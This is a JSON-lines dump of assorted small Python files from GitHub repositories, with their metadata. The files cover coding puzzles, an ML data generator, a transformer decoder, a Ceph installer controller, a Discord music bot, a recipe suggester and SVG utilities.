palindromic if it reads the same forward and backward. \"\"\"\n\nclass Solution:\n def firstPalindrome(self, words: List[str]) -> str:\n for word in words:\n l,r = 0, len(word) - 1\n \n while l < r:\n if word[l] != word[r]:\n break\n \n l += 1\n r -= 1\n if l >= r:\n return word\n \n return \"\"","repo_name":"kotynskm/leetcode","sub_path":"firstpalindrome.py","file_name":"firstpalindrome.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73036839827","text":"# https://adventofcode.com/2019/day/12\n\nfrom Universe import Universe\nfrom Moon import Moon\nimport math\nimport re\nfrom copy import copy\n\n\n\nf = open(\"Input12.txt\")\n\ninputs = f.read().splitlines()\nf.close()\n\ndef parse_moon(string):\n m = re.search(r'', string)\n x, y, z = int(m.group(1)), int(m.group(2)), int(m.group(3))\n return Moon(x, y, z)\n\n\n# --- Part 1 ---\n\nmoons = [parse_moon(str) for str in inputs]\nuniverse = Universe(moons)\n\nfor _ in range(1000):\n universe.step()\nprint(universe.total_energy())\n\n\n# --- Part 2 ---\n\ndef lowest_common_multiple(nums):\n lcm = nums[0]\n for i in nums[1:]:\n lcm = int(lcm*i/math.gcd(lcm, i))\n return lcm\n\ndef steps_to_repeat_per_axis(universe):\n initial_universe = copy(universe)\n steps_to_repeat = []\n for axis in ['x', 'y', 'z']:\n moons = [parse_moon(str) for str in inputs]\n universe = Universe(moons)\n universe.step()\n\n while not universe.equal_on_axis(axis, initial_universe):\n universe.step()\n steps_to_repeat.append(universe.steps)\n return steps_to_repeat\n\n\nmoons = [parse_moon(str) for str in inputs]\nuniverse = Universe(moons)\n\nsteps_to_repeat = steps_to_repeat_per_axis(universe)\n\nprint(lowest_common_multiple(steps_to_repeat))\n\n\n\n","repo_name":"xwmtp/advent-of-code-2019","sub_path":"Day12/Day12.py","file_name":"Day12.py","file_ext":"py","file_size_in_byte":1295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22717379341","text":"__author__ = 'Igor Sorokin'\n__email__ = 'igor.sorokin66@gmail.com'\n__status__ = 'Completed'\n\nrank = [\"A\", \"10\", \"10\", \"10\", \"10\", \"9\", \"8\", \"7\", \"6\", \"5\", \"4\", \"3\", \"2\"]\nsuit = [\"c\", \"s\", \"h\", \"d\"]\n\n\ndef generate_deck():\n deck = []\n for s in suit:\n for r in rank:\n deck.append(r)\n return deck\n\nimport random\nshoe = []\n[shoe.extend(generate_deck()) for i in range(6)]\nrandom.shuffle(shoe)\nprint(shoe)\n\nwhile True:\n if len(shoe) < 4:\n break\n dealer = [shoe.pop(), shoe.pop()]\n player = [shoe.pop(), shoe.pop()]\n\n if \"A\" not in player:\n total = int(player[0]) + int(player[1])\n\ndef decision(player, dealer):\n transPlayer = [9, 10, 11, 12, 13, 14, 15, 16]\n transDealer = [2, 3, 4, 5, 6, 7, 8, 9, 10, \"A\"]\n chart = [[\"H\", \"H\", \"H\", \"H\"],\n [\"H\", \"H\", \"H\", \"H\"],\n [\"H\", \"H\", \"H\", \"H\"],\n [\"H\", \"H\", \"H\", \"H\"]]","repo_name":"igorsorokin66/PokerHUD","sub_path":"Black.py","file_name":"Black.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70653062865","text":"from . import DAG\nfrom .simulation import NonIID_Simulation, Multi_IID_Simulation\n\ndef data_gen(graph_type,\n node,\n edge,\n seed,\n num_client,\n gen_method,\n n,\n sem_type,\n dataset_property=None,\n method='nonlinear'):\n \n \"\"\"\n Simulate the random data property for each client.\n\n Parameters\n ----------\n graph_type : the type of graph, choose from ['er', 'sf'].\n node : number of nodes.\n edge : number of edges.\n seed : seed.\n num_client : number of the clients.\n gen_method : data generation tyep, choose from ['multiiid', 'noniid'].\n n : number of observations on each client.\n sem_type : the sem_type for iid data.\n dataset_property : the property of the data.\n method : linear or nonlinear data, choose from ['linear', 'nonlinear'].\n\n Return\n ------\n B_true : the binary DAG graph (matrix).\n W_true : the weight matrixs for each client.\n dataset : the generated dataset.\n data_all : put all data together.\n\n \"\"\"\n\n if graph_type == 'er':\n B_true, W_true = DAG.er_graph(n_nodes=node,\n n_edges=edge,\n weight_range=(0.5, 2.0),\n seed=seed,\n num_client=num_client)\n elif graph_type == 'sf':\n B_true, W_true = DAG.sf_graph(n_nodes=node,\n n_edges=edge,\n weight_range=(0.5, 2.0),\n seed=seed,\n num_client=num_client)\n else:\n assert False, \"invalid graph type {}\".format(graph_type)\n\n if gen_method == 'noniid':\n dataset, data_all = NonIID_Simulation(W_true,\n dataset_property,\n n,\n seed\n )\n elif gen_method == 'multiiid':\n dataset, data_all = Multi_IID_Simulation(W_true,\n sem_type,\n n,\n method,\n seed)\n\n else:\n assert False, \"invalid gen_method {}\".format(gen_method)\n\n return B_true, W_true, dataset, data_all","repo_name":"ErdunGAO/FedDAG","sub_path":"datasets/data_gen.py","file_name":"data_gen.py","file_ext":"py","file_size_in_byte":2631,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"48"} +{"seq_id":"16689484705","text":"import torch\nimport torch.nn as nn\n\nfrom model.competition.multi_head_attention import MultiHeadAttention\nfrom model.competition.positional_wise_feed_forward import PositionalWiseFeedForward\nfrom model.competition.positional_encoding import PositionalEncoding\n\nfrom model.tool.padding_mask import padding_mask\nfrom model.tool.sequence_mask import sequence_mask\n\n\nclass DecoderLayer(nn.Module):\n def __init__(self, model_dim, num_heads=8, ffn_dim=2048, dropout=8.0):\n super(DecoderLayer, self).__init__()\n\n self.attention = MultiHeadAttention(model_dim, num_heads, dropout)\n self.feed_forward = PositionalWiseFeedForward(model_dim, ffn_dim, dropout)\n\n def forward(self, dec_inputs, enc_outputs, self_attn_mask=None, context_attn_mask=None):\n\n dec_output, self_attention = self.attention(dec_inputs, dec_inputs, dec_inputs, self_attn_mask)\n dec_output, context_attention = self.attention(enc_outputs, enc_outputs, dec_output, context_attn_mask)\n\n dec_output = self.feed_forward(dec_output)\n\n return dec_output, self_attention, context_attention\n\n\nclass Decoder(nn.Module):\n def __init__(self, vocab_size, max_seq_len, num_layers=6, model_dim=512, num_heads=8, ffn_dim=2048, dropout=0.0):\n\n super(Decoder, self).__init__()\n\n self.num_layers = num_layers\n\n self.decoder_layers = nn.ModuleList(\n [DecoderLayer(model_dim, num_heads, ffn_dim, dropout) for _ in range(num_layers)]\n )\n\n self.seq_embedding = nn.Embedding(vocab_size + 1, model_dim, padding_idx=0)\n self.pos_embedding = PositionalEncoding(model_dim, max_seq_len)\n\n def forward(self, inputs, inputs_len, enc_output, context_attn_mask=None):\n output = self.seq_embedding(inputs)\n output += self.pos_embedding(inputs_len)\n\n self_attention_padding_mask = padding_mask(inputs, inputs)\n\n seq_mask = sequence_mask(inputs)\n self_attn_mask = torch.gt((self_attention_padding_mask + seq_mask), 0)\n\n self_attentions = []\n context_attentions = []\n for decoder in self.decoder_layers:\n output, self_attn, context_attn = decoder(\n output, enc_output, self_attn_mask, context_attn_mask)\n self_attentions.append(self_attn)\n context_attentions.append(context_attn)\n\n return output, self_attentions, context_attentions","repo_name":"CerryXu/pytorch-transformer","sub_path":"model/decoder.py","file_name":"decoder.py","file_ext":"py","file_size_in_byte":2381,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"37235129117","text":"#! /usr/bin/env python\n\n'''\nAUTHOR: Molly Peeples\nDATE: 10/29/2015\nNAME: spectator.py\nDESCRIPTION: gets demographics and makes quick look plots and tables for Hubble/COS data (optimized for FUV)\n'''\n\nimport argparse\nimport sys\n\nimport drive_quick_look \nimport scrape_headers\n\ndef parse_args():\n '''\n Parse command line arguments. Returns args object.\n '''\n parser = argparse.ArgumentParser(description = \\\n \"scrapes headers and makes quicklooks for everything in 'targets.list' file\")\n parser.add_argument('targets', metavar='list', type=str, action='store',\n help=\"\"\"targets.list is the file to be read in;\n first column = flag (0,1) if target is to be used,\n second column = target/directory name\"\"\")\n\n parser.add_argument('--clobber', dest='clobber', action='store_true')\n parser.add_argument('--no-clobber', dest='clobber', action='store_false', help=\"default is no clobbering\")\n parser.set_defaults(clobber=False)\n\n args = parser.parse_args()\n return args\n\n\n\n#-----------------------------------------------------------------------------------------------------\n\nif __name__ == \"__main__\":\n args = parse_args()\n targets = (args.targets, args.clobber) \n\n scrape_headers.scrape_headers(args.targets)\n drive_quick_look.drive_quick_look(targets)\n\n sys.exit(\"\"\"\n \n ~~~~~~~*~*~*~*~~~~~~~~ ~*~*~*~*~~~~~~~~~~~~~\n ~~~~~~~*~*~*~*~~~~~~ all done!!!! spectra are fun! ~~~~~~~~~~~~~~~~~~~\n ~~~~~~~*~*~*~*~~~~~~~~ ~*~*~*~*~~~~~~~~~~~~~\n \"\"\")\n","repo_name":"oscarlwz/hsla","sub_path":"spectator.py","file_name":"spectator.py","file_ext":"py","file_size_in_byte":1685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"3379281465","text":"import logging\n\nfrom pecan import expose, request\nfrom pecan.ext.notario import validate\nfrom uuid import uuid4\n\nfrom ceph_installer.controllers import error\nfrom ceph_installer.tasks import call_ansible\nfrom ceph_installer import schemas\nfrom ceph_installer import models\nfrom ceph_installer import util\n\nlogger = logging.getLogger(__name__)\n\n\nclass RGWController(object):\n\n @expose('json')\n def index(self):\n # TODO: allow some autodiscovery here so that clients can see what is\n # available\n return dict()\n\n @expose(generic=True, template='json')\n def install(self):\n error(405)\n\n @install.when(method='POST', template='json')\n @validate(schemas.install_schema, handler=\"/errors/schema\")\n def install_post(self):\n hosts = request.json.get('hosts')\n identifier = str(uuid4())\n extra_vars = util.get_install_extra_vars(request.json)\n verbose_ansible = request.json.get('verbose', False)\n task = models.Task(\n request=request,\n identifier=identifier,\n endpoint=request.path,\n )\n # we need an explicit commit here because the command may finish before\n # we conclude this request\n models.commit()\n kwargs = dict(\n extra_vars=extra_vars,\n tags=\"package-install\",\n verbose=verbose_ansible,\n )\n call_ansible.apply_async(\n args=([('rgws', hosts)], identifier),\n kwargs=kwargs,\n )\n\n return task\n\n @expose(generic=True, template='json')\n def configure(self):\n error(405)\n\n @configure.when(method='POST', template='json')\n @validate(schemas.rgw_configure_schema, handler=\"/errors/schema\")\n def configure_post(self):\n hosts = [request.json['host']]\n # even with configuring we need to tell ceph-ansible\n # if we're working with upstream ceph or red hat ceph storage\n verbose_ansible = request.json.get('verbose', False)\n extra_vars = util.get_install_extra_vars(request.json)\n monitor_hosts = util.parse_monitors(request.json[\"monitors\"])\n # this update will take everything in the ``request.json`` body and\n # just pass it in as extra-vars. That is the reason why optional values\n # like \"calamari\" are not looked up explicitly. If they are passed in\n # they will be used.\n extra_vars.update(request.json)\n if 'verbose' in extra_vars:\n del extra_vars['verbose']\n if 'conf' in extra_vars:\n extra_vars['ceph_conf_overrides'] = request.json['conf']\n del extra_vars['conf']\n if \"cluster_name\" in extra_vars:\n extra_vars[\"cluster\"] = extra_vars[\"cluster_name\"]\n del extra_vars[\"cluster_name\"]\n del extra_vars['host']\n extra_vars.pop('interface', None)\n extra_vars.pop('address', None)\n identifier = str(uuid4())\n task = models.Task(\n request=request,\n identifier=identifier,\n playbook=\"infrastructure-playbooks/rgw-standalone.yml\",\n endpoint=request.path,\n )\n # we need an explicit commit here because the command may finish before\n # we conclude this request\n models.commit()\n kwargs = dict(\n extra_vars=extra_vars,\n skip_tags=\"package-install\",\n verbose=verbose_ansible,\n )\n call_ansible.apply_async(\n args=([('rgws', hosts), ('mons', monitor_hosts)], identifier),\n kwargs=kwargs,\n )\n\n return task\n","repo_name":"ceph/ceph-installer","sub_path":"ceph_installer/controllers/rgw.py","file_name":"rgw.py","file_ext":"py","file_size_in_byte":3594,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"48"} +{"seq_id":"32417863601","text":"import requests\n\ndef fetch_photo():\n #fetch new image from lorem picsum\n filename = '../imagecache/todayspic.jpg'\n request = requests.get(\"https://picsum.photos/800\", stream=True)\n if request.status_code == 200:\n with open(filename, 'wb') as image:\n for c in request:\n image.write(c)\n else:\n print(\"Unable to download image, using previous cached image\")\n","repo_name":"StephenMC27/CS_321_Group_Project","sub_path":"src/photo.py","file_name":"photo.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"73027876624","text":"# Crie um programa que leia o nome e o preço de vários produtos. O programa\r\n# deverá perguntar se o usuário vai continuar ou não. No final, mostre:\r\n# A) Qual é o total gasto na compra.\r\n# B) Quantos produtos custam mais de R$1000.\r\n# C) Qual é o nome do produto mais barato\r\n #INCOMPLETO\r\ncont = 0\r\nprecoTotal = 0\r\nwhile True:\r\n nome = input('Digite o nome do produto: ')\r\n precoProduto = float(input('Digite o preço do produto: '))\r\n precoTotal = precoProduto + precoTotal\r\n if precoProduto >= 1000:\r\n cont += 1\r\n resp = input('Quer continuar [S/N]? ').strip().lower()[0]\r\n if resp != 's':\r\n break\r\nprint(f'''\r\nO total gasto na compra é de: {precoTotal}\r\n{cont} produtos custam mais de R$ 1000\r\nO nome do produto mais barato é:\r\n''')","repo_name":"Bianca-22/Blue_T3C6-mod1","sub_path":"Aula 07/Exercício 07.py","file_name":"Exercício 07.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4122011840","text":"import discord\nfrom discord.ext import commands\nfrom discord import Client\nfrom discord.ext.commands import Context\nfrom discord import VoiceClient\nfrom discord import Embed\n\nimport youtube_dl\n\n\nclass Music(commands.Cog):\n def __init__(self, client: Client) -> None:\n self.client = client\n self.title = None\n self.url = None\n\n def set_url(self, url: str):\n self.url = url\n\n def set_title(self, title: str):\n self.title = title\n\n def set_thumbnail(self, thumbnail: str):\n self.thumbnail = thumbnail\n\n def clear_info(self):\n self.title = None\n self.url = None\n self.thumbnail = None\n\n @commands.Cog.listener()\n async def on_ready(self):\n print(\"Music Cog\")\n\n @commands.command(name=\"leave\")\n async def leave(self, ctx: Context):\n if ctx.author.voice is None:\n await ctx.reply('No estas en ningun canal de voz')\n return\n\n await ctx.guild.voice_client.disconnect()\n\n @commands.group(name=\"msc\", invoke_without_command=True)\n async def msc(self, ctx: Context):\n pass\n\n @msc.command(name=\"play\")\n async def play(self, ctx: Context, url):\n\n if ctx.author.voice is None:\n await ctx.reply('No estas en ningun canal de voz')\n return\n\n await ctx.author.voice.channel.connect()\n\n vc: VoiceClient = ctx.voice_client\n\n FFMPEG_OPTIONS = {\n 'before_options': '-reconnect 1 -reconnect_streamed 1 -reconnect_delay_max 5', 'options': '-vn'\n }\n YDL_OPTIONS = {'format': 'bestaudio'}\n\n with youtube_dl.YoutubeDL(YDL_OPTIONS) as ydl:\n info = ydl.extract_info(url=url, download=False)\n url2 = info['formats'][0]['url']\n self.set_title(info.get('title', None))\n self.set_url(url)\n self.set_thumbnail(info['thumbnails'][-1]['url'])\n\n source = await discord.FFmpegOpusAudio.from_probe(\n url2, **FFMPEG_OPTIONS)\n vc.play(source, after=lambda e: self.clear_info())\n\n @msc.command(name=\"pause\")\n async def pause(self, ctx: Context):\n if ctx.author.voice is None:\n await ctx.reply('No estas en ningun canal de voz')\n return\n\n vc: VoiceClient = ctx.voice_client\n\n if vc is None:\n await ctx.reply('Nada reproduciendo')\n else:\n vc.pause()\n\n @msc.command(name=\"resume\")\n async def resume(self, ctx: Context):\n if ctx.author.voice is None:\n await ctx.reply('No estas en ningun canal de voz')\n return\n\n vc: VoiceClient = ctx.voice_client\n\n if vc is None:\n return\n\n if vc.is_paused():\n vc.resume()\n\n @msc.command(name=\"info\")\n async def info(self, ctx: Context):\n if not self.title and not self.url:\n await ctx.reply('Nada reproduciendo')\n return\n\n embed = Embed()\n embed.title = self.title\n embed.url = self.url\n embed.description = self.url\n embed.set_image(url=self.thumbnail)\n\n await ctx.reply(embed=embed)\n\n\ndef setup(client):\n client.add_cog(Music(client))\n","repo_name":"iLegendTz/Wattbot-py","sub_path":"Cogs/music.py","file_name":"music.py","file_ext":"py","file_size_in_byte":3188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2478464879","text":"def areAlmostEquivalent(s, t):\n # Write your code here\n arr = []\n countS = [0]*26\n countT = [0]*26\n for i in s:\n print(i,\"i\")\n countS[ord(i) - ord(\"a\")]+=1\n for i in t:\n countT[ord(i) - ord(\"a\")] +=1\n for j in range(26):\n if (countS[j] - countT[j]) <= 3:\n arr.append(\"YES\")\n else:\n arr.append(\"NO\")\n return arr\n","repo_name":"thenunachi/dailyPracticeLeetCode","sub_path":"leetcode/strings/f.py","file_name":"f.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43571534334","text":"from suggester import *\nfrom flask import Flask, json, jsonify\nfrom classif import *\nfrom invert_ind import *\n\napp = Flask(__name__)\napp.config['JSON_AS_ASCII'] = False\n\n@app.route('/get_ingr/', methods=['GET'])\ndef get_ingr(prefix):\n prefix = prefix.lower().replace('ё', 'е')\n my_str = ', '.join(list(data[data.name==prefix].ingredients)[0])\n return my_str\n\n@app.route('/get_suggest/', methods=['GET'])\ndef suggestions(prefix):\n suggest = suggester(root, prefix)\n sug_string = ''\n for i in suggest:\n sug_string += i + '
    '\n return sug_string\n\n@app.route('/get_best_suggest/', methods=['GET'])\ndef rat(prefix):\n suggest = rating(root, prefix, 10, data)\n sug_string = ''\n for i in suggest:\n sug_string += i + '
    '\n return sug_string\n\n@app.route('/classif/', methods=['GET'])\ndef pred_class(prefix):\n return pred(prefix,clf,ingr_l)\n\n@app.route('/find_rec/', methods=['GET'])\ndef get_rec(prefix):\n str_rec = ''\n set_rec = get_recipes_many(prefix,df)\n for i in set_rec:\n str_rec += i + '
    '\n return str_rec\n\nif __name__ == \"__main__\":\n\n #suggester\n data = pd.read_json('cook_dataset.json')\n data['name'] = data['name'].apply(lambda x: x.lower().replace('ё', 'е'))\n root = TrieNode('*')\n for i in data['name']:\n add(root, i)\n #classif\n (clf,ingr_l) = classif()\n #invert_ind\n with open('df_classif.pickle', 'rb') as f:\n df = pickle.load(f)\n app.run()\n","repo_name":"Darya7335/cookbook","sub_path":"proj_serv.py","file_name":"proj_serv.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33633676416","text":"from bing_utils import SimpleSearch\nfrom multiprocessing import Process\nimport json\n\nterms = ['scrapping', 'test typefile: pdf inurl: *.pdf', 'enthec']\n\ndef ThreadSearch(term, n_pages=1):\n print(f'[i] Scrapping term {term} with total pages: {n_pages}')\n data = []\n for n in range(n_pages):\n data.extend(SimpleSearch(term, n_page=n + 1))\n name = term.replace(' ', '-').replace(':', '').replace('*', '').replace('.','')\n with open(f'json_files/{name}.json', 'w', encoding='utf-8') as file:\n file.write(json.dumps(data, ensure_ascii=False))\n\nif __name__ == '__main__':\n for term in terms:\n Process(target=ThreadSearch, args=[term, 5]).start()","repo_name":"JosLeDeta/bing-scrapper","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16652591507","text":"from .svgTools import *\nfrom vectorrvnn.utils.boxes import * \nfrom copy import deepcopy\nfrom functools import reduce\nimport svgpathtools as svg\n\ndef toPath (lines) : \n return svg.Path(*lines)\n\ndef toLines (path) : \n return path._segments\n\ndef rotate (tree, degrees, pt) :\n globalTransform(tree.doc,\n dict(transform=f'rotate({degrees:.3f} {pt.real:.3f} {pt.imag:.3f})'))\n for i, line in enumerate(tree.lines) : \n tree.lines[i] = toLines(toPath(line).rotated(degrees, pt))\n normalize(tree)\n tree.recalculateBoxes()\n return tree \n\ndef translate(tree, tx, ty) : \n globalTransform(tree.doc,\n dict(transform=f'translate({tx:.3f} {ty:.3f})'))\n for i, line in enumerate(tree.lines) : \n tree.lines[i] = toLines(toPath(line).translated(complex(tx, ty)))\n normalize(tree)\n tree.recalculateBoxes()\n return tree\n\ndef scale(tree, sx, sy=None) : \n \"\"\" Modify this because it is more convenient to scale the document in place \"\"\"\n if sy is None : \n sy = sx\n globalTransform(tree.doc,\n dict(transform=f'scale({sx:.3f} {sy:.3f})'))\n for j, _ in enumerate(tree.lines) :\n for i, line in enumerate(tree.lines[j]) : \n st = complex(line.start.real / sx, line.start.imag / sy)\n en = complex(line.end.real / sx, line.end.imag / sy)\n tree.lines[j][i] = svg.Line(start=st, end=en)\n normalize(tree)\n tree.recalculateBoxes()\n return tree\n\ndef modAttr (tree, attr, transformer) : \n \"\"\" Modify attribute for all paths in document\n\n Examples : \n 1. modAttr(tree, 'opacity', lambda k, x: '0.5') # set opacity to 0.5 \n 2. modAttr(tree, 'stroke-width', lambda k, x : '10') # set stroke-width to 10\n 3. modAttr(tree, 'fill', lambda k, x : '#ff0000') # set fill to red for all paths\n \"\"\"\n root = tree.doc.tree.getroot()\n for elt in root.iter() : \n if elt.tag in PATH_TAGS : \n xmlAttributeSet(elt, attr, transformer(attr, elt))\n return tree\n\ndef modAttrs (tree, attrDict) :\n \"\"\" apply modifications to attributes simultaneously \"\"\"\n root = tree.doc.tree.getroot()\n for elt in root.iter() : \n if elt.tag in PATH_TAGS : \n for k, v in attrDict.items():\n xmlAttributeSet(elt, k, v(k, elt))\n return tree\n\ndef normalize (tree) : \n box = union([pathBBox(svg.Path(*lines)) for lines in tree.lines])\n setDocBBox(tree.doc, box.normalized() * 1.2)\n","repo_name":"Vrroom/vectorrvnn","sub_path":"vectorrvnn/utils/svg/svgDataTransforms.py","file_name":"svgDataTransforms.py","file_ext":"py","file_size_in_byte":2459,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"7190174728","text":"# 2098. 외판원 순회\n\nfrom sys import stdin\n\n\ndef dfs(cur, rec): # 현재 위치, 방문 기록\n if rec == (1<0: \n c,c2=st.columns(2)\n discount=c.slider(\"Discount on Target Segment:\",min_value=0,max_value=50,step=5,value=5)\n increase=c2.slider(\"Anticipated Sales Increase on Target Segment:\",min_value=0,max_value=50,value=20)\n df2=getRevSplit(segTarget,discount,increase)\n dfAll=df2.loc[df2['TYPE'].isin(['ALL','EXCEPT'])] \n dfAll=dfAll.groupby('PR',as_index=False).sum()\n dfAll.sort_values(by=['PR'],inplace=True)\n dfAll=dfAll[['PR','REV']]\n result = dfAll.to_json(orient=\"values\")\n parsed = json.loads(result)\n dfDisc=df2.loc[df2['TYPE'].isin(['ALL','DISC'])]\n dfDisc=dfDisc.groupby('PR',as_index=False).sum()\n dfDisc.sort_values('PR')\n dfDisc=dfDisc[['PR','REV']]\n resultDisc = dfDisc.to_json(orient=\"values\")\n parsedDisc = json.loads(resultDisc) \n cat=json.loads(dfDisc.PR.to_json(orient=\"values\"))\n co,co1=st.columns(2)\n cur=dfAll.sum().REV\n sim=dfDisc.sum().REV\n co.metric(\"Revenue Current\",\"{:,.0f}€\".format(cur).replace(',', ' '))\n co1.metric(\"Revenue Impact\",\"{:,.0f}€\".format(sim).replace(',', ' '),str(round(((sim/cur)-1)*100,2)+0.01) + \"%\")\n chartdef2={\n \"chart\": {\n \"type\": 'column',\n \"zoomType\": 'x',\n 'zooming': {\n 'mouseWheel': False\n }\n },\n \"xAxis\": {\n \"type\": 'category'\n },\n \"yAxis\":{\n \"title\":\"\"\n },\n \"title\": {\n \"text\": ''\n },\n \"series\": [\n { \"type\": 'column',\n \"dataSorting\": {\n \"enabled\": True,\n \"matchByName\": True\n },\n \"name\":\"Actual Revenue\",\n \"data\": parsed\n },\n { \"type\": 'column',\n \"dataSorting\": {\n \"enabled\": True,\n \"matchByName\": True\n },\n \"name\":\"Simulated Revenue\",\n \"data\": parsedDisc,\n \"color\":\"red\"\n }\n ]\n \n }\n hct.streamlit_highcharts(chartdef2)\n st.markdown(\"## Trigger Marketing Campaign\") \n seg=\",\".join(\"'{0}'\".format(w) for w in segTarget)\n query=f'''SELECT RFM.CUSTOMER_ID, RFM.SEGMENT, CUST.CUSTOMER_EMAIL, '{discount}%' as DISCOUNT\n FROM \"bdm_rfm\" as RFM\n INNER JOIN \"bdm_customers\" as CUST\n ON RFM.CUSTOMER_ID=CUST.CUSTOMER_ID\n WHERE RFM.actual_state=true AND RFM.SEGMENT in ({seg});\n '''\n dfCust =pd.DataFrame(session.sql(query).collect())\n st.dataframe(dfCust,use_container_width=True)\n colB,cc=st.columns(2) \n bck=colB.selectbox(\"Select Keboola Bucket:\",key=\"bck\",options= list(map(lambda v: v['id'], buckets)))\n date_time = datetime.now().strftime(\"%m_%d_%Y_%H_%M_%S\")\n value = kb.keboola_upload(\n keboola_URL=keboola_URL,\n keboola_key=keboola_key,\n keboola_table_name=\"Marketing_Discount_\" +date_time,\n keboola_bucket_id=bck,\n keboola_file_path=saveFile(dfCust),\n keboola_primary_key=[\"\"],\n label=\"UPLOAD TABLE\",\n key=\"two\"\n )\n value\n#TODO\n","repo_name":"aalteirac/streamlit_keboola_vhol_pc","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74121489746","text":"# https://atcoder.jp/contests/dp/submissions/13594958\n# C - Vacation\nimport sys\n\nsys.setrecursionlimit(10 ** 7)\nf_inf = float('inf')\nmod = 10 ** 9 + 7\n\n\ndef resolve():\n n = int(input())\n ABC = [list(map(int, input().split())) for _ in range(n)]\n\n dp = [[0 for _ in range(3)] for _ in range(n)]\n dp[0][0] = ABC[0][0]\n dp[0][1] = ABC[0][1]\n dp[0][2] = ABC[0][2]\n\n for i in range(1, n):\n a = ABC[i][0]\n b = ABC[i][1]\n c = ABC[i][2]\n\n dp[i][0] = max(dp[i][0], dp[i - 1][1] + a, dp[i - 1][2] + a)\n dp[i][1] = max(dp[i][1], dp[i - 1][0] + b, dp[i - 1][2] + b)\n dp[i][2] = max(dp[i][2], dp[i - 1][0] + c, dp[i - 1][1] + c)\n\n print(max(dp[n - 1][0], dp[n - 1][1], dp[n - 1][2]))\n\n\nif __name__ == '__main__':\n resolve()\n","repo_name":"happa64/AtCoder_Beginner_Contest","sub_path":"Unrated/EDPC/EDPC-C.py","file_name":"EDPC-C.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11824490649","text":"from util import read\nimport numpy as np\nfrom collections import defaultdict, deque, Counter\n\nday = '11'\nprint(f'Day {day}')\nprint('------')\nx = 5153 # grid serial number\ngrid_serial_no = 5153\n\nc = np.zeros((300, 300))\n\n\n\ndef computePowerLevel(i,j):\n \"\"\"\n 0 <= j,i <= 299\n 1 <= x,y <= 300\n \"\"\"\n x, y = j + 1, i + 1\n rackID = x + 10\n power_level = rackID * y\n power_level += grid_serial_no\n power_level *= rackID\n power_level = int((power_level % 1000) / 100)\n power_level -= 5\n return power_level\n\n\nc = np.array([[computePowerLevel(i,j) for j in range(300)]\n for i in range(300)])\n\ndef sum_convolve(m, w=1):\n o = np.zeros((m.shape[0]-w+1, m.shape[1]-w+1))\n for i in range(o.shape[0]):\n for j in range(o.shape[1]):\n o[i,j] = m[i:i+w, j:j+w].sum()\n return o\n\ndef getMaxPower(w):\n if w < 1:\n raise ValueError('Require w >= 1')\n elif w == 1:\n cc = c\n else:\n cc = sum_convolve(c, w)\n cc_max = cc.max()\n i, j = np.where(cc == cc_max)\n return [cc_max, j[0]+1, i[0] + 1, w]\n \n# Part 1\nprint(getMaxPower(3))\n\n\ndef summedAreaTable(c):\n sat = np.array([[c[:i, :j].sum() for j in range(c.shape[1])]\n for i in range(c.shape[0])])\n return sat\n\ndef computeArea(S, i, j, w):\n if (i == 0) and (j == 0):\n return S[w-1, w-1]\n elif i == 0:\n return S[i+w-1, j+w-1] - S[i+w-1, j-1]\n elif j == 0:\n return S[i+w-1, j+w-1] - S[i-1, j+w-1]\n else:\n return S[i+w-1, j+w-1] + S[i-1, j-1] - S[i+w-1, j-1] - S[i-1, j+w-1]\n return\n\ndef getMaxPowerSize(c, S=None, w=3):\n if S is None:\n S = summedAreaTable(c)\n all_powers = [[computeArea(S, i, j, w)\n for j in range(S.shape[1]-w+1)]\n for i in range(S.shape[0]-w+1)]\n all_powers = np.array(all_powers)\n all_powers_max = all_powers.max()\n i_max, j_max = np.where(all_powers == all_powers_max)\n return [all_powers_max, j_max[0] + 1, i_max[0]+1, w]\n\nS = summedAreaTable(c)\nP = np.array([getMaxPowerSize(c, S, w) for w in range(1, 301)])\nprint('summed area table:', P[np.argmax(P[:, 0])])\n\n# Part 2\nsizes = range(1, 301)\npowers = []\nfor j, w in enumerate(sizes):\n powers.append(getMaxPower(w))\n # sort of arbitrary\n if (j > 25) and (powers[j][0] < powers[j-1][0]):\n break\npowers = np.array(powers)\nprint('arbitrary cut-off', powers[np.argmax(powers[:, 0])])\n\n\n","repo_name":"asberk/aoc18","sub_path":"d11.py","file_name":"d11.py","file_ext":"py","file_size_in_byte":2433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74931876945","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n'''\n\n元件:\n ESP32 DevkitV1\n 128*64 SSD1306 OLED SPI/IIC\n 